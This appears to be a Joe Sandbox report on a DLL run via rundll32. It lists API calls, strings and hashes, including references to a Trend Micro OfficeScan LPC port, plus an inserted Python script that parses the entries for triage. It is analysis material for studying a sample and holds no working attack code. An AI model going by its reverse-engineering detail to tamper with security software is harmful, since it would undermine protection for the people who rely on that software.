                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005914
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 000000018000594C
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 000000018000596E
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005986
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005995
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005A05
                                                                                                                      • lstrcmpiW.KERNEL32(?,?,00000001,?,?,00000000,00000000,0000000180007281,?,?,?,00000001800065C0,?,00000000,00000000,00000001800067C4), ref: 0000000180004C7A
                                                                                                                      • lstrcmpiW.KERNEL32(?,?,00000001,?,?,00000000,00000000,0000000180007281,?,?,?,00000001800065C0,?,00000000,00000000,00000001800067C4), ref: 0000000180004C98
                                                                                                                      • CharNextW.USER32(?,?,00000001,?,?,00000000,00000000,0000000180007281,?,?,?,00000001800065C0,?,00000000,00000000,00000001800067C4), ref: 0000000180004D0E
                                                                                                                      • CharNextW.USER32 ref: 0000000180004E33
                                                                                                                      • CharNextW.USER32 ref: 0000000180004E4F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3586774192-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Local$AllocCloseErrorFreePort$ConnectCreateInitLastReplyRequestSectionStatusStringUnicodeWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1580264094-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !y<z$9_>$$TJz5$_ftv$e$k$l3>2$mY<M$r
                                                                                                                      • API String ID: 0-2568991842
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$Console
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 786612050-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocLocalPort$ConnectCreateReplyRequestSectionWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4119859285-0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Port$Request$ConnectReplyWait
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 3401284753-3887548279
APIs
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000D277
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: DebugDebuggerErrorLastOutputPresentString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 389471666-631824599
APIs
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00000001800190DC
  • Part of subcall function 0000000180011B1C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,0000000180011AC9), ref: 0000000180011B25
  • Part of subcall function 0000000180011B1C: GetCurrentProcess.KERNEL32(?,?,?,?,0000000180011AC9), ref: 0000000180011B4A
Strings
Similarity
• API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
• String ID: *?
• API String ID: 4036615347-2564092906
APIs
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e03d739db6423ffcc8e006e4e4d65807781c6aecac58f04167dbdfb07267b1ba
                                                                                                                      • Instruction ID: 6af9ee9013878f181c15f1713bc348178ffb3d4f2e8e94475c7dc28adbcd32fa
                                                                                                                      • Opcode Fuzzy Hash: e03d739db6423ffcc8e006e4e4d65807781c6aecac58f04167dbdfb07267b1ba
                                                                                                                      • Instruction Fuzzy Hash: 8351E4B3B0568843DB258B49FC42796F7A5FB987C5F00A126EE8D57B68EB3CD5818700
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 485612231-0
                                                                                                                      • Opcode ID: c3dd02af005dbbc35606ada343e24a33c525e9539510d4980a914492448f05e2
                                                                                                                      • Instruction ID: 22ddbfb3a3317d9b8aad32e2f9d64e1308a7fd9bb0cbcf172f9f766cedf38c1a
                                                                                                                      • Opcode Fuzzy Hash: c3dd02af005dbbc35606ada343e24a33c525e9539510d4980a914492448f05e2
                                                                                                                      • Instruction Fuzzy Hash: 3B419372310E5882EF89CF26D964799A3A1B74CFD4F49D026EE4D87B54DE3CC54A8300
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fdaf272eb1844347be1a48321dfbfe9aa180a2ef53fcf2148db801cde92ebed4
                                                                                                                      • Instruction ID: fdeabef4a8a2aaa41da3dbf865f29282371d157f4ae765bdeabfc42282697580
                                                                                                                      • Opcode Fuzzy Hash: fdaf272eb1844347be1a48321dfbfe9aa180a2ef53fcf2148db801cde92ebed4
                                                                                                                      • Instruction Fuzzy Hash: F8F068B17192598AEBD68F28A84276A77D0E35C3C0F51C01AE58983B04D63C82558F54

Control-flow Graph
• Function at 0x180005BC0 (basic blocks 0x180005BC0-0x180005FD0; graph image not reproduced). API calls in the graph: CoTaskMemAlloc, CharNextW, lstrcmpiW, CoTaskMemFree. Internal calls: 0x180005250, 0x180005370, 0x1800056C0, 0x180007640, 0x180007AA0, 0x18000DA80, 0x18000E884, 0x180011CF8.
                                                                                                                      APIs
                                                                                                                      • CoTaskMemAlloc.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005C60
                                                                                                                      • wcsstr.LIBVCRUNTIME ref: 0000000180005CCD
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CDF
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CEB
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CF7
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005D03
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005D61
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005DDD
                                                                                                                      • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005E12
                                                                                                                        • Part of subcall function 00000001800056C0: CharNextW.USER32 ref: 00000001800056D3
                                                                                                                      • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005E9F
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005F16
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005F32
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$Task$AllocFreelstrcmpiwcsstr
                                                                                                                      • String ID: }}$HKCR$HKCU{Software{Classes$REGISTRY
                                                                                                                      • API String ID: 2678557286-2791478717
                                                                                                                      • Opcode ID: d6952ec5bd2a17902043c70f842be37df4190b69f8620cff9adf972c45d68580
                                                                                                                      • Instruction ID: bbdfaccdea3bba81881f4aa5ee89a92688eb783e9208bb5ac5d175e121a00dd0
                                                                                                                      • Opcode Fuzzy Hash: d6952ec5bd2a17902043c70f842be37df4190b69f8620cff9adf972c45d68580
                                                                                                                      • Instruction Fuzzy Hash: CCB19232205B4885EBA6DB21E4543AA33A0F74CBD6F509525FADE477D4EF78C7488740

Control-flow Graph
• Function at 0x18000C110 (basic blocks 0x18000C110-0x18000C470; graph image not reproduced). API calls in the graph: CreateFileW, GetFileSizeEx, GetCurrentProcessId, GetCurrentThreadId, CreateFileMappingW, GetLastError, CloseHandle. Internal calls: 0x1800085D0, 0x180002CE0, 0x18000CA00 (the function whose strings include \OfficeScanLPC), 0x18000D628, 0x18000DA80, 0x180011AEC.
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CreateCurrent$MappingProcessSizeThread
                                                                                                                      • String ID: OfficeScan-%u-%u
                                                                                                                      • API String ID: 1334661976-1227074125
                                                                                                                      • Opcode ID: c944cfb7fab92ac0311fe24493515b38dafa1cb6b3d5034ff05c7775568ff91c
                                                                                                                      • Instruction ID: f95e6d22b5e4b53b0f1e4e57d2c4d13b4ddeeb21717f079512e00d2e30ce1131
                                                                                                                      • Opcode Fuzzy Hash: c944cfb7fab92ac0311fe24493515b38dafa1cb6b3d5034ff05c7775568ff91c
                                                                                                                      • Instruction Fuzzy Hash: 4A91BB72B10B4486FB52DBA9E8447ED3361BB897E4F409315AE6953AD9EF38C24DC300

Control-flow Graph
• Function at 0x18000CA00 (basic blocks 0x18000CA00-0x18000D1F0; graph image not reproduced). No direct API calls appear in the graph. Internal calls: 0x180004140, 0x180002900, 0x180004400, 0x180002840, 0x180008CC0, 0x180003D50, 0x1800085D0, 0x180001640, 0x180001650, 0x18000D628, 0x180001220, 0x180011AEC, 0x18000D8D4, 0x180007A40, 0x18000DA80.
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \OfficeScanLPC$extraInfo$mapName$mappingHandle$objectName$objectType$scanType$size$sourceProcess$version
                                                                                                                      • API String ID: 0-295255216
                                                                                                                      • Opcode ID: d79e9de4eb6fea0678a29b6ca6e59e0546cf9f04dbcf4b616b7e8ba94308a403
                                                                                                                      • Instruction ID: 0d4fa4b774054f253373325e50542481224c0e6a607b19d5a8355063636d8abb
                                                                                                                      • Opcode Fuzzy Hash: d79e9de4eb6fea0678a29b6ca6e59e0546cf9f04dbcf4b616b7e8ba94308a403
                                                                                                                      • Instruction Fuzzy Hash: 44129A32705B888AEB42CB74E4803DC37B6A7497D8F548116EE8D27B9ADF34C659C780
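The per-function entries above (the APIs list, the '$'-joined String ID, the API ID and the fuzzy hashes) are what an analyst scrapes out of a Joe Sandbox report to pivot on. The Python below is an added example for this report, not Joe Sandbox code: it parses entries in this page's text layout into records, builds a histogram of direct API calls, and flags entries whose strings match an analyst-chosen indicator list. The SAMPLE text is copied verbatim from the 0x180005BC0 and 0x18000C110 entries on this page; the INDICATORS table and its labels are assumptions made for the example.

```python
"""Triage helpers for Joe Sandbox per-function entries in this page's text
layout: an "APIs" bullet list followed by "Memory Dump Source",
"Joe Sandbox IDA Plugin" and "Similarity" bullet fields.

Added example for this report; not Joe Sandbox code.  SAMPLE is copied
verbatim from the 0x180005BC0 and 0x18000C110 entries on this page.  The
INDICATORS table and its labels are assumptions made for the example.
"""
import re
from collections import Counter

SAMPLE = """\
APIs
• CoTaskMemAlloc.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005C60
• wcsstr.LIBVCRUNTIME ref: 0000000180005CCD
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CDF
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CEB
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CF7
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005D03
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005D61
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005DDD
• CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005E12
  • Part of subcall function 00000001800056C0: CharNextW.USER32 ref: 00000001800056D3
• lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005E9F
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005F16
• CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005F32
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CharNext$Task$AllocFreelstrcmpiwcsstr
• String ID: }}$HKCR$HKCU{Software{Classes$REGISTRY
• API String ID: 2678557286-2791478717
• Instruction Fuzzy Hash: CCB19232205B4885EBA6DB21E4543AA33A0F74CBD6F509525FADE477D4EF78C7488740
Similarity
• API ID: File$CreateCurrent$MappingProcessSizeThread
• String ID: OfficeScan-%u-%u
• API String ID: 1334661976-1227074125
• Instruction Fuzzy Hash: 4A91BB72B10B4486FB52DBA9E8447ED3361BB897E4F409315AE6953AD9EF38C24DC300
"""

# Direct API call bullets: "• Name.Module(args), ref: ADDR" or "• Name.Module ref: ADDR".
API_RE = re.compile(r"^•\s+(\w+)\.(\w+)(?:\(.*?\))?,?\s+ref:\s+([0-9A-Fa-f]+)\s*$")
# Calls made inside a callee: "• Part of subcall function ADDR: Name.Module ref: ADDR".
SUBCALL_RE = re.compile(r"^•\s+Part of subcall function ([0-9A-Fa-f]+):\s+(\w+)\.(\w+)\s+ref:\s+([0-9A-Fa-f]+)")
# Similarity / dump-source fields: "• Key Words: value".
FIELD_RE = re.compile(r"^•\s+([A-Za-z][A-Za-z ]*?):\s*(.*)$")


def _new():
    return {"apis": [], "subcall_apis": [], "fields": {}}


def parse_entries(text):
    """Split report text into per-function records.  A record is closed by its
    'Instruction Fuzzy Hash' field, the last Similarity bullet per function."""
    entries, cur = [], _new()
    for raw in text.splitlines():
        line = raw.strip()
        m = SUBCALL_RE.match(line)
        if m:
            cur["subcall_apis"].append(
                {"caller": m[1].upper(), "api": m[2], "module": m[3], "ref": m[4].upper()})
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"api": m[1], "module": m[2], "ref": m[3].upper()})
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m[1], m[2].strip()
            cur["fields"][key] = val
            if key == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = _new()
    return entries


def strings_of(entry):
    """Joe Sandbox joins a function's strings with '$' in the String ID field."""
    return [s for s in entry["fields"].get("String ID", "").split("$") if s]


def api_histogram(entries):
    """Direct API call counts across all parsed functions (subcalls excluded)."""
    return Counter(a["api"] for e in entries for a in e["apis"])


# Assumed indicator table: substring -> why an analyst would pivot on it.
INDICATORS = {
    "OfficeScan": "Trend Micro OfficeScan name used for a named object or message",
    "HKCR": "registry path handling (HKCR / HKCU Software Classes)",
}


def triage(entries, indicators=INDICATORS):
    """Return (API ID, strings, matched labels) for every entry whose strings
    contain an indicator substring."""
    hits = []
    for e in entries:
        strs = strings_of(e)
        labels = sorted({lbl for s in strs for needle, lbl in indicators.items() if needle in s})
        if labels:
            hits.append((e["fields"].get("API ID", ""), strs, labels))
    return hits


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print(api_histogram(parsed).most_common(3))
    for api_id, strs, labels in triage(parsed):
        print(api_id, strs, labels)
```

Feed it the text of a whole report (or the entries you copied out of one) and the histogram shows which imports dominate the sample while triage() surfaces the functions worth opening first; the subcall entries keep the caller address, so CharNextW inside 0x1800056C0 is not confused with the direct calls of 0x180005BC0.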

Control-flow Graph
• Function at 0x180001E60 (basic blocks 0x180001E60-0x1800023FF; graph image not reproduced). No direct API calls appear in the graph. Internal calls (the same callee sequence as 0x18000CA00): 0x180004140, 0x180002900, 0x180004400, 0x180002840, 0x180008CC0, 0x180003D50, 0x1800085D0, 0x180001640, 0x180001650, 0x18000D628, 0x180001220, 0x180011AEC, 0x18000D8D4, 0x180007A40, 0x18000DA80.
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0000000180002900: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180002A64
                                                                                                                        • Part of subcall function 0000000180002900: _CxxThrowException.LIBVCRUNTIME ref: 0000000180002AB6
                                                                                                                        • Part of subcall function 0000000180004400: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800044D3
                                                                                                                        • Part of subcall function 0000000180001650: RtlInitUnicodeString.NTDLL ref: 00000001800016E6
                                                                                                                        • Part of subcall function 0000000180001650: NtClose.NTDLL ref: 000000018000175A
                                                                                                                        • Part of subcall function 0000000180001650: NtClose.NTDLL ref: 0000000180001769
                                                                                                                        • Part of subcall function 0000000180001650: RtlNtStatusToDosError.NTDLL ref: 00000001800017A6
                                                                                                                        • Part of subcall function 0000000180001650: SetLastError.KERNEL32 ref: 00000001800017AE
                                                                                                                        • Part of subcall function 0000000180001650: LocalFree.KERNEL32 ref: 00000001800017C6
                                                                                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800022C7
                                                                                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800022CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$CloseError$ExceptionFreeInitLastLocalStatusStringThrowUnicode
                                                                                                                      • String ID: \OfficeScanLPC$mapName$mappingHandle$objectName$objectType$scanType$size$sourceProcess$version
                                                                                                                      • API String ID: 3005093427-2404656728
                                                                                                                      • Opcode ID: 28c97f36d74b1a47469f08ade993c45906df21fe725b4018bed03fb5b85ac439
                                                                                                                      • Instruction ID: 0be3e0bb8fe5a8c08eeb416419ac2ac58a0f85e131ad06a8c39d6188d6196533
